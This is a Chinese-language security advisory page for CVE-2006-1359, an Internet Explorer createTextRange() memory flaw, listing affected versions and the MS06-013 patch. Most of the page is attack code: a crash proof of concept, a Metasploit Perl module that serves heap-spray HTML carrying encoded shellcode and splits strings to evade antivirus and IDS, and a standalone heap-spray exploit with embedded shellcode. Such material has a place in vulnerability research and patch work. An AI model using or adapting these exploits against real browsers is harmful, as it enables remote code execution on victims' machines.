发布日期：2006-03-22
更新日期：2006-04-11

受影响系统：

Microsoft Internet Explorer 6.0 SP1
Microsoft Internet Explorer 5.0 SP4
Microsoft Internet Explorer 6.0
    - Microsoft Windows XP SP2
    - Microsoft Windows Server 2003 SP1
    - Microsoft Windows Server 2003

描述：

---

BUGTRAQ  ID: 17196
CVE(CAN) ID: CVE-2006-1359

Microsoft Internet Explorer是微软发布的非常流行的WEB浏览器。

Internet Explorer的createTextRange()函数实现上存在漏洞，远程攻击者可能利用此漏洞在客户机器上执行任意指令。

Internet Explorer使用createTextRange()时在某些环境下可能导致无需的列表指针引用，这样在试图调用引用的32位地址时就会出现错误，如下所示：

0x7D53C15D MOV ECX, DWORD PTR DS:[EDI]
..
0x7D53C166 CALL DWORD PTR [ECX]

由于这种引用，ECX会指向很远的不存在的内存位置，导致IE崩溃，也可能执行任意指令。

<*来源：Stelian Ene （stelian.ene@gecadtech.com）
        Joshua Heyer
        Andreas Sandblad （sandblad@acc.umu.se）
  
  链接：http://www.computerterrorism.com/research/ct22-03-2006
        http://secunia.com/advisories/18680/print/
        http://www.microsoft.com/technet/security/Bulletin/MS06-013.mspx?pf=true
        http://www.us-cert.gov/cas/techalerts/TA06-101A.html
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<input type="checkbox" id='c'>
<script>
    r=document.getElementById("c");
    a=r.createTextRange();
</script>

Exploit 1

##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::ie_checkbox;

use strict;
use base "Msf::Exploit";
use Pex::Text;
use IO::Socket::INET;
use  POSIX;

my $advanced =
  {
  };

my $info =
  {
    'Name'           => 'Internet Explorer checkbox',
    'Version'        => '$Revision: 1.0 $',
    'Authors'        =>
      [
                '<justfriends4n0w [at] yahoo.com>'
      ],

    'Description'    =>
      Pex::Text::Freeform(qq{
            This module exploits a vulnerability in Internet Explorer's setTextRange on a checkbox
              

}),

    'Arch'           => [ 'x86' ],
    'OS'             => [ 'win32', 'winxp', 'win2003' ],
    'Priv'           => 0,

    'UserOpts'       =>
      {
        'HTTPPORT' => [ 1, 'PORT', 'The local HTTP listener port', 8080      ],
        'HTTPHOST' => [ 0, 'HOST', 'The local HTTP listener host', "0.0.0.0" ],
      },

    'Payload'        =>
      {
        'Space'    => 1000,
        'MaxNops'  => 0,
        'Keys'     => [ '-ws2ord', '-bind' ],
#        'Keys'     => [ '-ws2ord' ],
      },

    'Refs'           =>
      [
        [ 'CVE', '' ],

      ],

    'DefaultTarget'  => 0,
    'Targets'        =>
      [
        [ 'Automatic - Windows 2000, Windows XP' ]
      ],
    
    'Keys'           => [ 'ie', 'internal' ],

    'DisclosureDate' => '22 Mar 2006',
  };

sub new
{
    my $class = shift;
    my $self;

    $self = $class->SUPER::new(
        {
            'Info'     => $info,
            'Advanced' => $advanced,
        },
        @_);

    return $self;
}
sub JSUnescape #Taken from Mozilla_Compareto by Aviv Raff and H D Moore
{
    my $self = shift;
    my $data = shift;
    my $code = '';
    
    # Encode the shellcode via %u sequences for JS's unescape() function
    my $idx = 0;
    while ($idx < length($data) - 1) {
        my $c1 = ord(substr($data, $idx, 1));
        my $c2 = ord(substr($data, $idx+1, 1));    
        $code .= sprintf('%%u%.2x%.2x', $c2, $c1);    
        $idx += 2;
}
    
    return $code;
}


sub Exploit
{
    my $self = shift;
    my $server = IO::Socket::INET->new(
        LocalHost => $self->GetVar('HTTPHOST'),
        LocalPort => $self->GetVar('HTTPPORT'),
        ReuseAddr => 1,
        Listen    => 1,
        Proto     => 'tcp');
    my $client;

    # Did the listener create fail?
    if (not defined($server))
    {
        $self->PrintLine("[-] Failed to create local HTTP listener on " . $self->GetVar('HTTPPORT'));
        return;
    }

    $self->PrintLine("[*] Waiting for connections to http://" . $self->GetVar('HTTPHOST') . ":" . $self->GetVar('HTTPPORT') . " ...");

    while (defined($client = $server->accept()))
    {
        $self->HandleHttpClient(fd => Msf::Socket::Tcp->new_from_socket($client));
    }

    return;
}

sub HandleHttpClient
{
    my $self = shift;
    my ($fd) = @{{@_}}{qw/fd/};
    
    #my $targetIdx = $self->GetVar('TARGET');
    #my $target    = $self->Targets->[$targetIdx];
    #my $ret       = $target->[1];
    
    my $shellcode = $self->GetVar('EncodedPayload')->Payload;
    $shellcode   = $self->JSUnescape($shellcode);
    

      my $content;
    my $rhost;
    my $rport;

    my $targets =
      {
        
        "Windows XP"   => [0 ],
        
      };
    my $target;
    my $os;

    # Read the HTTP command
    my ($cmd, $url, $proto) = split / /, $fd->RecvLine(10);

    # Read in the HTTP headers
    while (my $line = $fd->RecvLine(10))
    {
        my ($var, $val) = split /: /, $line;

        # Break out if we reach the end of the headers
        last if (not defined($var) or not defined($val));

        if ($var eq 'User-Agent')
        {    
    $self->PrintLine( " *****useragent:" . $val  );

            $os = "Windows 2003" if (!$os and $val =~ /Windows NT 5.2/);
            $os = "Windows XP"   if (!$os and $val =~ /Windows NT 5.1/);
            $os = "Windows 2000" if (!$os and $val =~ /Windows NT 5.0/);
            $os = "Windows NT"   if (!$os and $val =~ /Windows NT/);
            $os = "Unknown"      if (!$os);
        }
    }

    # Set the remote host information
    ($rport, $rhost) = ($fd->PeerPort, $fd->PeerAddr);

    



my $content="<input type=\"checkbox\" id=\"blah\">\n <SCRIPT language=\"javascript\">\n" .
"shellcode = unescape(\"$shellcode\");\n" .
"bigblock = unescape(\"%u9090%u9090\");\n" .
"slackspace = 20 + shellcode.length;\n" .
"while (bigblock.length < slackspace)\n" .
"bigblock += bigblock;\n" .
"fillblock = bigblock.substring(0, slackspace);\n" .
"block = bigblock.substring(0, bigblock.length-slackspace);\n" .
"while(block.length + slackspace < 0x40000) " .
"block = block + block + fillblock;\n" .
"memory = new Array();\n" .
"for ( i = 0; i < 2020; i++ ) " .
"memory[i] = block + shellcode;\n";

#Break up the string to avoid Antivirus/IDS
$content=$content .  
" s= \"document.getEle\";\n" .
"s=s + \"mentById\"; \n" .
"s=s + \"(\'blah\')\"; \n " .
"s=s + \".create\";\n" .
"s=s + \"TextRange();\";\n" .
"eval(s);\n" .
"</script>";


    $self->PrintLine("[*] HTTP Client connected from $rhost:$rport using $os, sending payload...");

    # Transmit the HTTP response
    $fd->Send(
        "HTTP/1.1 200 OK\r\n" .
          "Content-Type: text/html\r\n" .
          "Content-Length: " . length($content) . "\r\n" .
          "Connection: close\r\n" .
          "\r\n" .
          "$content"
      );

    $fd->Close();
}

1;

Exploit 2

&lt;!--
-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_
/\
\/    Internet Explorer Remote Code Execution Exploit v 0.1
/\          by Darkeagle of Unl0ck Research Team
\/
/\    used SkyLined idea of exploitation. special tnx goes to him.
\/

Affected Software    :  Microsoft Internet Explorer 6.x, IE7 Beta 2
Severity        :  Critical
Impact        :  Remote System Access
Solution Status    :  ** UNPATCHED **
Discovered by     :  Computer Terrorism (UK)
Advisory Date    :  22nd March, 2006
Tested        :  WinXP SP2 RUS IE 6.0 (full patched)

Vulnerability details:

PoC from CyberTerrorists crashes IE and overwrites EIP. EIP points to unknown place.
In my case it points to 0x3c0474c2.
Exploit fills heap with "nops+shellcode" 'til 0x3CxxXXxx. Then IE trys to read memory
@ 0x3c0474c2. At this time 0x3c0474c2 contains nops+shellcode. In the end IE executes
shellcode.

Exploit needs more RAM.
Tested under 192mb RAM with 800mb of maximum page cache.

Under 512mb code was executed after 1-1.5 minutes.

Successfull exploitation will execute standart windows calculator.

Greets:
        Unl0ck Researchers,
        0x557 guys,
        ph4nt0m guys,
        sh0k, uf0,
        BlackSecurity guys,
        many otherz.

/\    http://unl0ck.net
\/    
/\    (c) 2004 - 2006
\/
-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_
--&gt;
&lt;pre&gt;
&lt;input type="checkbox" id="blah"&gt;
&lt;SCRIPT language="javascript"&gt;

shellcode = unescape(    "%u9090%u9090%u9090%uC929%uE983%uD9DB%uD9EE%u2474" +
            "%u5BF4%u7381%uA913%u4A67%u83CC%uFCEB%uF4E2%u8F55" +
            "%uCC0C%u67A9%u89C1%uEC95%uC936%u66D1%u47A5%u7FE6" +
            "%u93C1%u6689%u2FA1%u2E87%uF8C1%u6622%uFDA4%uFE69" +
            "%u48E6%u1369%u0D4D%u6A63%u0E4B%u9342%u9871%u638D" +
            "%u2F3F%u3822%uCD6E%u0142%uC0C1%uECE2%uD015%u8CA8" +
            "%uD0C1%u6622%u45A1%u43F5%u0F4E%uA798%u472E%u57E9" +
            "%u0CCF%u68D1%u8CC1%uECA5%uD03A%uEC04%uC422%u6C40" +
            "%uCC4A%uECA9%uF80A%u1BAC%uCC4A%uECA9%uF022%u56F6" +
            "%uACBC%u8CFF%uA447%uBFD7%uBFA8%uFFC1%u46B4%u30A7" +
            "%u2BB5%u8941%u33B5%u0456%uA02B%u49CA%uB42F%u67CC" +
            "%uCC4A%uD0FF");

    bigblock = unescape("%u9090%u9090");
    slackspace = 20 + shellcode.length

    while (bigblock.length &lt; slackspace)
        bigblock += bigblock;

    fillblock = bigblock.substring(0, slackspace);

    block = bigblock.substring(0, bigblock.length-slackspace);

    while(block.length + slackspace &lt; 0x40000)
        block = block + block + fillblock;

    memory = new Array();

    for ( i = 0; i &lt; 2020; i++ )
        memory[i] = block + shellcode;
  
    var r = document.getElementById('blah').createTextRange();

&lt;/script&gt;
&lt;/pre&gt;

建议：

---

临时解决方法：

* 禁用不可信任用户的活动脚本。

厂商补丁：

Microsoft
---------
Microsoft已经为此发布了一个安全公告（MS06-013）以及相应补丁:
MS06-013：Cumulative Security Update for Internet Explorer (912812)
链接：http://www.microsoft.com/technet/security/Bulletin/MS06-013.mspx?pf=true

浏览次数：6585
严重程度：40（网友投票）